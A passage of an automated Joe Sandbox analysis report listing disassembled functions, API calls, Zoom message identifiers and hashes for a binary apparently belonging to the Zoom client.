                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.notify.pt.feedback.info$customizedMsg$isTextFieldEnable$meetingInfo
                • API String ID: 1443623190-3133408118
                • Opcode ID: 5fd6b514b41998f51a3602969e677d00600f7d197986b0eaf71055b8496ab4d2
                • Instruction ID: d2be27660528b13dcbdd1532c0292cf70b95422413acd42435118362d7107a7b
                • Opcode Fuzzy Hash: 5fd6b514b41998f51a3602969e677d00600f7d197986b0eaf71055b8496ab4d2
                • Instruction Fuzzy Hash: E441C474D017089BCF18EFA4D849ADDB7B5AF44315F044128E812B7391DF709A8BDB69
                Function 00C94AE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94AE7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C756B6), ref: 00C94AFB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pair.relation.token.response,00000044), ref: 00C94B2D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C94B6A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pair.relation.token.response,?), ref: 00C94B9C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C94C0E
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C94C2B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C94C3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.pair.relation.token.response$response_id$result$token
                • API String ID: 1443623190-1409877518
                • Opcode ID: 02b2009a8d9fa5c31659c1033ef7651d99241c4755acc5438d4cfae06bb47acb
                • Instruction ID: 1d9e48a4dfba7473ccd4839691b16da2b976b04694caae0e385dff816fe067fa
                • Opcode Fuzzy Hash: 02b2009a8d9fa5c31659c1033ef7651d99241c4755acc5438d4cfae06bb47acb
                • Instruction Fuzzy Hash: 5441F474E017089FCF28EFA4C949ADDBB71AF44315F044118E812AB391DF709A8BDB65
                Function 00C90EA0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90EA7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70356), ref: 00C90EBB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,00000044), ref: 00C90EED
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C90F2A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,?), ref: 00C90F5C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C90FCE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90FEB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C90FFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: audioCapture$com.zoom.app.assistant.sip.virtual.microphone.create.request$deviceGUID$deviceName
                • API String ID: 1443623190-4234925160
                • Opcode ID: c01c33f8bcbdad4e1ad3afaa3b608a60fe131ee3b670f33e6a05ee3ebc57d513
                • Instruction ID: 079e97667e8d07bd22ccc1507a83cbf5c5c1b4d6eb588c7afb5cbb198c1ad060
                • Opcode Fuzzy Hash: c01c33f8bcbdad4e1ad3afaa3b608a60fe131ee3b670f33e6a05ee3ebc57d513
                • Instruction Fuzzy Hash: BB41D235D007099FCF24EFA4C8496DEB7B4AF44305F144118E812A7381DF709B8ADB69
                Function 00C680A0 Relevance: 21.0, APIs: 2, Strings: 10, Instructions: 28windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C680A7
                • ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z.RWSNDPQSKZ(com.Zoom.app.pt.shareFileInMeetingChat,0000274E,previewUrl,downloadUrl,fileName,thumbnailUrl,fileSize,fileId,type,previewPath,reqUid,00000004), ref: 00C680E8
                  • Part of subcall function 00C7F7A0: __EH_prolog3.LIBCMT ref: 00C7F7A7
                  • Part of subcall function 00C7F7A0: ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00000004,00C680ED,com.Zoom.app.pt.shareFileInMeetingChat,0000274E,previewUrl,downloadUrl), ref: 00C7F7CF
                  • Part of subcall function 00C8581F: __EH_prolog3_GS.LIBCMT ref: 00C85826
                  • Part of subcall function 00C8581F: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68114), ref: 00C8583A
                  • Part of subcall function 00C8581F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C8586C
                  • Part of subcall function 00C8581F: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C858A9
                  • Part of subcall function 00C8581F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.shareFileInMeetingChat,?,-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C858DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: V12@$Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$H000000000@H00000000@H_prolog3_Node@23@Root@Template_8@Template_9@Tree
                • String ID: com.Zoom.app.pt.shareFileInMeetingChat$downloadUrl$fileId$fileName$fileSize$previewPath$previewUrl$reqUid$thumbnailUrl$type
                • API String ID: 1181993142-3969188618
                • Opcode ID: 1a8be9c474eb716c3e0513196ec6ddbd2314cfa4abb92aa972cc18a14ef32b0d
                • Instruction ID: ac4e15c0b5de6eebcbcc801625fd0937cde7a822ddb666645dce2b7a24f3e8f8
                • Opcode Fuzzy Hash: 1a8be9c474eb716c3e0513196ec6ddbd2314cfa4abb92aa972cc18a14ef32b0d
                • Instruction Fuzzy Hash: 98F08CB0BC1B40FED21077547C87B1D65A0BB10F1AF504928B1407A3DACAF0050CD675
                Function 00C70960 Relevance: 21.0, APIs: 2, Strings: 10, Instructions: 28windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70967
                • ??0?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notify.leave.before.meeting.start,00002751,meetingNum,meetingID,userName,phoneID,secretKey,trackingId,externMsg,panalistKey,inMeetingAccessToken,00000004), ref: 00C709A8
                  • Part of subcall function 00C7AC40: __EH_prolog3.LIBCMT ref: 00C7AC47
                  • Part of subcall function 00C7AC40: ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00000004,00C709AD,com.Zoom.app.conf.notify.leave.before.meeting.start,00002751,meetingNum,meetingID), ref: 00C7AC6F
                  • Part of subcall function 00C911D0: __EH_prolog3_GS.LIBCMT ref: 00C911D7
                  • Part of subcall function 00C911D0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C709D4), ref: 00C911EB
                  • Part of subcall function 00C911D0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9121D
                  • Part of subcall function 00C911D0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9125A
                  • Part of subcall function 00C911D0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,?,-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9128C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@V12@_$H000000000@H00000000@H_prolog3_Node@23@Root@Template_8@_Template_9@_Tree
                • String ID: com.Zoom.app.conf.notify.leave.before.meeting.start$externMsg$inMeetingAccessToken$meetingID$meetingNum$panalistKey$phoneID$secretKey$trackingId$userName
                • API String ID: 2743289684-272397337
                • Opcode ID: 2b7d825653b8fdcadcc20ce90b42c11ec5c3f0741348c09d3ea346c8779805e8
                • Instruction ID: fbe916212ce702cda57ac1f356ef1c7403cdce8267c6e32570c2608d2d990bd4
                • Opcode Fuzzy Hash: 2b7d825653b8fdcadcc20ce90b42c11ec5c3f0741348c09d3ea346c8779805e8
                • Instruction Fuzzy Hash: 16F0A061BD0351BED700AB555D07B1DAAA0A720F27F50C468B608792D2CAF1850CDB75
                Function 00C5E9D5 Relevance: 19.7, APIs: 13, Instructions: 187COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E9DC
                • #21.MAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000070,00C5C4FE), ref: 00C5EA07
                • #19.MAPI32(00000000,?,00000070,00C5C4FE,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA21
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA45
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000101,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA6B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA97
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB01
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB1A
                • #140.MAPI32(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB37
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?), ref: 00C5EB70
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,?), ref: 00C5EBC4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EC03
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EC1A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$State@Unlock@$Assign@?$String$#140H_prolog3_
                • String ID:
                • API String ID: 1866024443-0
                • Opcode ID: 0bf3dad885ed6da3e445a9961382bc1cab87972826789d5bda01717f83dc4e4d
                • Instruction ID: 0c07d3314adeb7efeed231f622b7307f0cfe594bb0e8f2cf99bd6978393797ed
                • Opcode Fuzzy Hash: 0bf3dad885ed6da3e445a9961382bc1cab87972826789d5bda01717f83dc4e4d
                • Instruction Fuzzy Hash: 3C714D74D00218DFCB18DFA5C895A9DBBB5FF08316F24416DE816A7252CB70AE89CF18
                Function 00CD4A50 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 409memoryCOMMON
                Download Yara Rule
                APIs
                • GetModuleFileNameW.KERNEL32(00000000,00DEF0DC,000007CF,00000000,00000000), ref: 00CD4A72
                • SHGetSpecialFolderPathW.SHELL32(00000000,00DF007C,0000001A,00000000), ref: 00CD4DD7
                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00CD4E6E
                • HeapAlloc.KERNEL32(00000000), ref: 00CD4E75
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000024,00000000), ref: 00CD4EB9
                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00CD4ED8
                • GetProcessHeap.KERNEL32(00000000,00000026), ref: 00CD4F1C
                • HeapAlloc.KERNEL32(00000000), ref: 00CD4F23
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CD4FB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$AllocFolderPathProcessSpecial$Concurrency::cancel_current_taskDirectoryFileModuleNameWindows
                • String ID: $$\
                • API String ID: 3239228962-1395706711
                • Opcode ID: 58ba7b6dc0e154e8772dd5725391f3035f0457015a9771f3c95439433712489c
                • Instruction ID: 31d49ef5a936bfaa6dd6b777dadd4e90afcc8d4a446e386d6f681b352d353eda
                • Opcode Fuzzy Hash: 58ba7b6dc0e154e8772dd5725391f3035f0457015a9771f3c95439433712489c
                • Instruction Fuzzy Hash: 82D15935A00344DBD72C9B24DC85B7A77A5EB95350F24466BEB26C73A1EB709E80C7A0
                Function 00D0880A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___free_lconv_mon.LIBCMT ref: 00D0884E
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B6F
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B81
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B93
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BA5
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BB7
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BC9
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BDB
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BED
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BFF
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C11
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C23
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C35
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C47
                • _free.LIBCMT ref: 00D08843
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D08865
                • _free.LIBCMT ref: 00D0887A
                • _free.LIBCMT ref: 00D08885
                • _free.LIBCMT ref: 00D088A7
                • _free.LIBCMT ref: 00D088BA
                • _free.LIBCMT ref: 00D088C8
                • _free.LIBCMT ref: 00D088D3
                • _free.LIBCMT ref: 00D0890B
                • _free.LIBCMT ref: 00D08912
                • _free.LIBCMT ref: 00D0892F
                • _free.LIBCMT ref: 00D08947
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 3f95d8db83ddda560080a7d932a8f1c74de7f650519ff75e811030b865cccb3f
                • Instruction ID: 11ac57dfa321c4c4e117a87f5bb80bd2178e25eecce90f2d7a6bd8beee270a72
                • Opcode Fuzzy Hash: 3f95d8db83ddda560080a7d932a8f1c74de7f650519ff75e811030b865cccb3f
                • Instruction Fuzzy Hash: ED313E31A00345DFDB61AA39E845B6677E9EF00354F988429E599D71A1EF30ED80FB31
                Function 00C88010 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 130COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88017
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69869), ref: 00C8802B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C8805D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C8809A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.addClientLog,00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C880CC
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00002728,Action,00D35A98,00D35A7C), ref: 00C88186
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00002728,Action,00D35A98), ref: 00C881A3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C881B6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Action$ActionSource$com.Zoom.app.addClientLog
                • API String ID: 1443623190-860503860
                • Opcode ID: 45464f2322f32c0303eb3136055bb21fb57d6aa50632889b40c76402f7d34a6a
                • Instruction ID: d80d982e9caae6d513921428b21a307016224f3fe51b753c1d52ded6d1a52203
                • Opcode Fuzzy Hash: 45464f2322f32c0303eb3136055bb21fb57d6aa50632889b40c76402f7d34a6a
                • Instruction Fuzzy Hash: 5C410435A007158BCB24EBA0DC4969D7771AF85309F444128EC12AB395DF349E8FEB69
                Function 00CC0A60 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 118timeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC0A67
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,00000060), ref: 00CC0A7D
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA1761
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA178E
                • ?ToTimeT@Time@Cmm@@QBE_JXZ.RWSNDPQSKZ(00000060), ref: 00CC0A85
